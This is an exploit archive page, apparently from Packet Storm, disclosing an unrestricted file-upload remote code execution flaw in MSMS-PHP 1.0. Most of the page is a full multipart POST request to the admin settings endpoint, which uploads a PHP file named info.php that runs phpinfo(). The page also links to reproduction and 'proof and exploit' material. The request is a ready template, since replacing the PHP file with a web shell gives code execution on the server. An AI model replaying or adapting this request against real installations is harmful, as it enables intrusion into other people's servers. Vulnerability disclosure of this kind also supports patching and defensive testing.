exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MSMS-PHP 1.0 Shell Upload

MSMS-PHP 1.0 Shell Upload
Posted Mar 13, 2024
Authored by nu11secur1ty

MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell, php
SHA-256 | 06dd3743528c052502c13e65a54289e54ef53298ff6beb4c6ee8a4810bae36df

MSMS-PHP 1.0 Shell Upload

Change Mirror Download
## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using
## Author: nu11secur1ty
## Date: 03/13/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/file-upload

## Description:
The upload function and id=cimg parameter are not sanitizing correctly!
The attacker can upload any PHP file which he can execute directly on
the server!

STATUS: HIGH-CrITICAL Vulnerability

[+]Payload:
```POST
POST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 6318
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarypV7nBYU4nAonvWel
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112
Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/mobile_store/admin/?page=system_info
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dg
Connection: close

------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="name"

Mobile Store Management System - PHP
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="short_name"

MSMS-PHP
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="about_us"

<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;
margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:
70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:
0px; clear: both; border-top: 0px; height: 1px; background-image:
linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),
rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:
0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px
-160px; padding: 0px; position: sticky; top: 20px; width: 160px;
height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);
font-family: "Open Sans", Arial, sans-serif; font-size: 14px;
background-color: rgb(255, 255, 255);"></div><div id="bannerR"
style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;
top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,
0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;
background-color: rgb(255, 255, 255);"></div><div class="boxed"
style="margin: 10px 28.7969px; padding: 0px; clear: both; color:
rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:
14px; text-align: center; background-color: rgb(255, 255, 255);"><div
id="lipsum" style="margin: 0px; padding: 0px; text-align:
justify;"></div></div></div><p style="margin-right: 0px;
margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum
dolor sit amet, consectetur adipiscing elit. Nullam non ultrices
tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas
iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit
vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin
lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et
malesuada fames ac ante ipsum primis in faucibus. Pellentesque
habitant morbi tristique senectus et netus et malesuada fames ac
turpis egestas. Praesent eleifend interdum est, at gravida erat
molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur
et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus
porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus
sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at
lacus vehicula, aliquam purus quis, pharetra lorem.</p><p
style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;
padding: 0px;">Proin consectetur massa ut quam molestie porta. Donec
sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent
per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar
ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu
blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend
id, aliquet ut libero. Nunc scelerisque vulputate turpis quis
volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum
imperdiet, nulla vitae pharetra pretium, magna felis placerat libero,
quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper
cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien
consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae
tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,
id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;
margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id ante
vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat
turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus
pulvinar, eros id ultricies mollis, lectus velit viverra mi, at
venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh
felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur
dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in
convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula
pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p
style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;
padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis id
cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit
ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non
lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at
pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,
vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in
tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis
dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque
mauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;
margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quis
imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus
lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique
nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae
nisi. Curabitur at quam ut libero convallis mattis vel eget mauris.
Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus
nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum
non magna at, molestie gravida magna. Aenean neque sapien, volutpat a
ullamcorper nec, iaculis quis est.</p>
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="privacy_policy"

<p>Sample Privacy Policy<br></p>
------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="img"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarypV7nBYU4nAonvWel
Content-Disposition: form-data; name="banners[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarypV7nBYU4nAonvWel--

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)

## Time spent:
00:05:00


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close